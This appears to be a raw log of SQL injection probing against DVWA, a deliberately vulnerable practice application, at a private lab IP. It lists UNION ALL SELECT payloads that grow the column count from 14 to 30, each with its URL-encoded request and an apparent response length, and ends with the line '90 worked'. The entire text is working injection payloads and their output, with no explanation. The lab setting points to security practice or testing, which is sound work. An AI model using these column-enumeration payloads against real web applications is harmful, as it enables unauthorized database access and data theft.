	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23&Submit=Submit
	208

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23&Submit=Submit
	211

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23&Submit=Submit
	214

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23&Submit=Submit
	217

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23&Submit=Submit
	220

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23&Submit=Submit
	223

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23&Submit=Submit
	226

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23&Submit=Submit
	229

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23&Submit=Submit
	232

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23&Submit=Submit
	235

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23&Submit=Submit
	237

 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
	http://10.147.38.44/DVWA/vulnerabilities/sqli/?id=%20UNION%20ALL%20SELECT%20%27INJ%27%7C%7C%27ECT%27%7C%7C%27XXX%27%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23&Submit=Submit
	237

90 worked
